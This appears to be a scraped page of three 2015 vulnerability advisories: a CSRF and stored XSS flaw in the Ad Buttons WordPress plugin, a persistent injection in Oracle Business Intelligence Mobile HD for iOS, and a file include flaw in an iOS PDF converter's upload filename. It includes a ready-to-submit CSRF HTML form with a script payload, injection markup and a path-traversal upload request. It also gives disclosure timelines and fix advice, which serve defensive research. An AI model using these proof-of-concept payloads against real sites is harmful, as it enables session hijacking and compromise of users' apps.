  23. ================================================================ CSRF/Stored XSS Vulnerability in Ad Buttons Plugin ================================================================ . contents:: Table Of Content Overview ======== * Title :CSRF and Stored XSS Vulnerability in Ad Buttons Wordpress Plugin * Author: Kaustubh G. Padwad * Plugin Homepage: https://wordpress.org/plugins/ad-buttons/ * Severity: HIGH * Version Affected: Version 2.3.1 and mostly prior to it * Version Tested : Version 2.3.1 * version patched: Description =========== Vulnerable Parameter -------------------- * Your Ad Here' url About Vulnerability ------------------- This plugin is vulnerable to a combination of CSRF/XSS attack meaning that if an admin user can be tricked to visit a crafted URL created by attacker (via spear phishing/social engineering), the attacker can insert arbitrary script into admin page. Once exploited, admin's browser can be made to do almost anything the admin user could typically do by hijacking admin's cookies etc. Vulnerability Class =================== Cross Site Request Forgery (https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29) Cross Site Scripting (https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS) Steps to Reproduce: (POC) ========================= After installing the plugin 1. Goto Dashboard --> Ad button --> Setting 2. Insert this payload ## ">><script>+-+-1-+-+alert(document.cookie)</script> ## Into above mention Vulnerable parameter Save settings and see XSS in action 3. Visit Ad Button settings page of this plugin anytime later and you can see the script executing as it is stored. Plugin does not uses any nonces and hence, the same settings can be changed using CSRF attack and the PoC code for the same is below CSRF POC Code ============= <html> <body> <form action="http://127.0.0.1/wp/wp-admin/admin.php?page=ad-buttons-settings" method="POST"> <input type="hidden" name="ab_dspcnt" value="1" /> <input type="hidden" name="ab_title" value="" /> <input type="hidden" name="ab_target" value="bnk" /> <input type="hidden" name="ab_powered" value="1" /> <input type="hidden" name="ab_count" value="1" /> <input type="hidden" name="ab_yaht" value="pag" /> <input type="hidden" name="ab_yourad" value="44" /> <input type="hidden" name="ab_yahurl" value="">><script>+-+-1-+-+alert(6)</script>" /> <input type="hidden" name="ab_adsense_fixed" value="1" /> <input type="hidden" name="ab_adsense_pos" value="1" /> <input type="hidden" name="ab_adsense_pubid" value="pub-" /> <input type="hidden" name="ab_adsense_channel" value="" /> <input type="hidden" name="ab_adsense_corners" value="rc:0" /> <input type="hidden" name="ab_adsense_col_border" value="#" /> <input type="hidden" name="ab_adsense_col_title" value="#" /> <input type="hidden" name="ab_adsense_col_bg" value="#" /> <input type="hidden" name="ab_adsense_col_txt" value="#" /> <input type="hidden" name="ab_adsense_col_url" value="#" /> <input type="hidden" name="ab_width" value="<img" /> <input type="hidden" name="ab_padding" value="<img" /> <input type="hidden" name="Submit" value="Save Changes" /> <input type="submit" value="Submit request" /> </form> </body> </html> Mitigation ========== Plugin Closed Change Log ========== Plugin Closed Disclosure ========== 18-April-2015 Reported to Developer Plugin Closed 8-May-2015 Public credits ======= * Kaustubh Padwad * Information Security Researcher * kingkaustubh (at) me (dot) com * https://twitter.com/s3curityb3ast * http://breakthesec.com * https://www.linkedin.com/in/kaustubhpadwad Source
  24. Document Title: =============== Oracle Business Intelligence Mobile HD v11.x iOS - Persistent UI Vulnerability References (Source): ==================== http://vulnerability-lab.com/get_content.php?id=1361 Oracle Security ID: S0540289 Tracking ID: S0540289 Reporter ID: #1 2015Q1 Release Date: ============= 2015-05-06 Vulnerability Laboratory ID (VL-ID): ==================================== 1361 Common Vulnerability Scoring System: ==================================== 3.8 Product & Service Introduction: =============================== Oracle Business Intelligence Mobile HD brings new capabilities that allows users to make the most of their analytics information and leverage their existing investment in BI. Oracle Business Intelligence Mobile for Apple iPad is a mobile analytics app that allows you to view, analyze and act on Oracle Business Intelligence 11g content. Using Oracle Business Intelligence Mobile, you can view, analyze and act on all your analyses, dashboards, scorecards, reports, alerts and notifications on the go. Oracle Business Intelligence Mobile allows you to drill down reports, apply prompts to filter your data, view interactive formats on geo-spatial visualizations, view and interact with Dashboards, KPIs and Scorecards. You can save your analyses and Dashboards for offline viewing, and refresh them when online again; thus providing always-available access to the data you need. This app is compatible with Oracle Business Intelligence 11g, version 11.1.1.6.2BP1 and above. (Copy of the Vendor Homepage: http://www.oracle.com/technetwork/middleware/bi-foundation/bi-mobile-hd-1983913.html ) (Copy of the APP Homepage: https://itunes.apple.com/us/app/oracle-business-intelligence/id534035015 ) Abstract Advisory Information: ============================== The Vulnerability Laboratory Research Team discovered an application-side validation web vulnerability in the official Oracle Business Intelligence Mobile HD v11.1.1.7.0.2420 iOS web-application. Vulnerability Disclosure Timeline: ================================== 2014-10-27: Researcher Notification & Coordination (Benjamin Kunz Mejri - Evolution Security GmbH) 2014-11-01: Vendor Notification (Oracle Sec Alert Team - Acknowledgement Program) 2015-02-25: Vendor Response/Feedback (Oracle Sec Alert Team - Acknowledgement Program) 2015-04-15: Vendor Fix/Patch (Oracle Developer Team) 2015-05-01: Bug Bounty Reward (Oracle Sec Alert Team - CPU Bulletin Acknowledgement) 2015-05-06: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Oracle Product: Business Intelligence Mobile HD 11.1.1.7.0.2420 Exploitation Technique: ======================= Remote Severity Level: =============== Medium Technical Details & Description: ================================ The Vulnerability Laboratory Research Team discovered an application-side validation web vulnerability in the official Oracle Business Intelligence Mobile HD v11.1.1.7.0.2420 iOS web-application. The vulnerability is located in the input field of the dasboard file export name value of the local save (lokal speichern) function. After the injection of a system specific command to the input field of the dasboard name the attacker is able to use the email function. By clicking the email button the script code gets wrong encoded even if the attachment function is activated for pdf only. The wrong encoded input of the lokal save in the mimeAttachmentHeaderName (mimeAttachmentHeader) allows a local attacker to inject persistent system specific codes to compromise the integrity of the oracle ib email function. In case of the scenario the issue get first correct encoded on input and the reverse encoded inside allows to manipulate the mail context. Regular the function is in use to get the status notification mail with attached pdf or html file. For the tesings the pdf value was activated and without html. The security risk of the filter bypass and application-side input validation web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.8. Exploitation of the persistent web vulnerability requires a low privilege web application user account and low user interaction. Successful exploitation of the vulnerability results in session hijacking, persistent phishing, persistent external redirects, persistent load of malicous script codes or persistent web module context manipulation. Vulnerable Module(s): [+] Lokal speichern - Local save Vulnerable Parameter(s): [+] mimeAttachmentHeaderName (mimeAttachmentHeader) Affected Service(s): [+] Email - Local Dasboard File Proof of Concept (PoC): ======================= The application-side vulnerability can be exploited by local privilege application user accounts with low user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue. Manual reproduce of the vulnerability ... 1. Install the oracle business intelligence mobile hd ios app to your apple device (https://itunes.apple.com/us/app/oracle-business-intelligence/id534035015) 2. Register to your server service to get access to the client functions 2. Click the dashboard button to access 3. Now, we push top right in the navigation the local save (lokal speichern) button 4. Inject system specific payload with script code to the lokal save dashboard filename input field 5. Switch back to the app index and open the saved dashboard that as been saved locally with the payload (mimeAttachmentHeaderName) 6. Push in the top right navigation the email button 7. The mail client opens with the wrong encoded payload inside of the mail with the template of the dashboard 8. Successful reproduce of the security vulnerability! PoC: Email - Local Dasboard File <meta http-equiv="content-type" content="text/html; "> <div>"><[PERSISTENT INJECTED SCRIPT CODE!]"></x></div><div><br><br></div><br> <fieldset class="mimeAttachmentHeader"><legend class="mimeAttachmentHeaderName">"><"x">%20<[PERSISTENT INJECTED SCRIPT CODE!]>.html</legend></fieldset><br> Solution - Fix & Patch: ======================= The vulnerability can be patched by a secure restriction and filter validation of the local dashboard file save module. Encode the input fields and parse the ouput next to reverse converting the context of the application through the mail function. The issue is not located in the apple device configuration because of the validation of the mimeAttachmentHeaderName in connection with the email function is broken. Security Risk: ============== The security risk of the application-side input validation web vulnerability in the oracle mobile application is estimated as medium. (CVSS 3.8) Credits & Authors: ================== Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com] Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/ Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Copyright © 2015 | Vulnerability Laboratory - Evolution Security GmbH ™ -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com CONTACT: research@vulnerability-lab.com PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt Source
  25. Document Title: =============== PDF Converter & Editor 2.1 iOS - File Include Vulnerability References (Source): ==================== http://www.vulnerability-lab.com/get_content.php?id=1480 Release Date: ============= 2015-05-06 Vulnerability Laboratory ID (VL-ID): ==================================== 1480 Common Vulnerability Scoring System: ==================================== 6.9 Product & Service Introduction: =============================== Text Editor & PDF Creator is your all-in-one document management solution for iPhone, iPod touch and iPad. It can catch documents from PC or Mac via USB cable or WIFI, email attachments, Dropbox and box and save it on your iPhone, iPod Touch or iPad locally. (Copy of the Vendor Homepage: https://itunes.apple.com/it/app/text-editor-pdf-creator/id639156936 ) Abstract Advisory Information: ============================== The Vulnerability Laboratory Core Research Team discovered file include web vulnerability in the official AppzCreative - PDF Converter & Text Editor v2.1 iOS mobile web-application. Vulnerability Disclosure Timeline: ================================== 2015-05-06: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== AppzCreative Ltd Product: PDF Converter & Text Editor - iOS Web Application (Wifi) 2.1 Exploitation Technique: ======================= Remote Severity Level: =============== High Technical Details & Description: ================================ A local file include web vulnerability has been discovered in the official AppzCreative - PDF Converter & Text Editor v2.1 iOS mobile web-application. The local file include web vulnerability allows remote attackers to unauthorized include local file/path requests or system specific path commands to compromise the mobile web-application. The web vulnerability is located in the `filename` value of the `submit upload` module. Remote attackers are able to inject own files with malicious `filename` values in the `file upload` POST method request to compromise the mobile web-application. The local file/path include execution occcurs in the index file dir listing of the wifi interface. The attacker is able to inject the local file include request by usage of the `wifi interface` in connection with the vulnerable file upload POST method request. Remote attackers are also able to exploit the filename issue in combination with persistent injected script codes to execute different malicious attack requests. The attack vector is located on the application-side of the wifi service and the request method to inject is POST. The security risk of the local file include vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.9. Exploitation of the local file include web vulnerability requires no user interaction or privileged web-application user account. Successful exploitation of the local file include vulnerability results in mobile application compromise or connected device component compromise. Request Method(s): [+] [POST] Vulnerable Module(s): [+] Submit (Upload) Vulnerable Parameter(s): [+] filename Affected Module(s): [+] Index File Dir Listing (http://localhost:52437/) Proof of Concept (PoC): ======================= The local file include web vulnerability can be exploited by remote attackers (network) without privileged application user account and without user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue. Manual steps to reproduce the vulnerability ... 1. Install the software to your iOS device 2. Start the mobile ios software and activate the web-server 3. Open the wifi interface for file transfers 4. Start a session tamper and upload a random fil 5. Change in the live tamper by interception of the vulnerable value the filename input (lfi payload) 6. Save the input by processing to continue the request 7. The code executes in the main file dir index list of the local web-server (localhost:52437) 8. Open the link with the private folder and attach the file for successful exploitation with the path value 9. Successful reproduce of the vulnerability! PoC: Upload File (http://localhost:52437/Box/) <div id="module_main"><bq>Files</bq><p><a href="..">..</a><br> <a href="<iframe>2.png"><../[LOCAL FILE INCLUDE VULNERABILITY IN FILENAME!]>2.png</a> ( 0.5 Kb, 2015-04-30 10:58:46 +0000)<br /> </p><form action="" method="post" enctype="multipart/form-data" name="form1" id="form1"><label>upload file<input type="file" name="file" id="file" /></label><label><input type="submit" name="button" id="button" value="Submit" /></label></form></div></center></body></html></iframe></a></p></div> --- PoC Session Logs [POST] (LFI - Filename) --- Status: 200[OK] POST http://localhost:52437/Box/ Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[3262] Mime Type[application/x-unknown-content-type] Request Header: Host[localhost:52437] User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Accept-Language[de,en-US;q=0.7,en;q=0.3] Accept-Encoding[gzip, deflate] Referer[http://localhost:52437/Box/] Connection[keep-alive] POST-Daten: POST_DATA[-----------------------------321711425710317 Content-Disposition: form-data; name="file"; filename="../[LOCAL FILE INCLUDE VULNERABILITY IN FILENAME!]>2.png" Content-Type: image/png Reference(s): http://localhost:52437/ http://localhost:52437/Box/ Solution - Fix & Patch: ======================= The vulnerability can be patched by a secure validation of the filename value in the upload POST method request. Restrict the filename input and disallow special chars. Ensure that not multiple file extensions are loaded in the filename value to prevent arbitrary file upload attacks. Encode the output in the file dir index list with the vulnerable name value to prevent application-side script code injection attacks. Security Risk: ============== The security rsik of the local file include web vulnerability in the filename value of the wifi service is estimated as high. (CVSS 6.9) Credits & Authors: ================== Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com] Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/ Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com CONTACT: research@vulnerability-lab.com PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt Source
×
×
  • Create New...